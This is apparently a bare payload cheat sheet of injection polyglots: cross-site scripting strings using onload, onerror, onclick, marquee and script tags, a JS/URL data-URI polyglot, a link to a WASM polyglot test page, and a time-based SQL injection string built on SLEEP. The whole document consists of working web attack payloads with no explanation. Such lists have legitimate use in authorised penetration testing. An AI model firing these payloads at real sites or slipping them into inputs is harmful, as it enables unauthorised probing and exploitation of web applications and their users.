
#JS/URL polyglot"
data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}

#WASM
https://vulnerabledoma.in/polyglot/wasmjscsshtml.html

#BlindXSS
'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1)>

#xss
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// 

#xss2
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> 
 
#xss3
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> ￼￼

#sqli
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
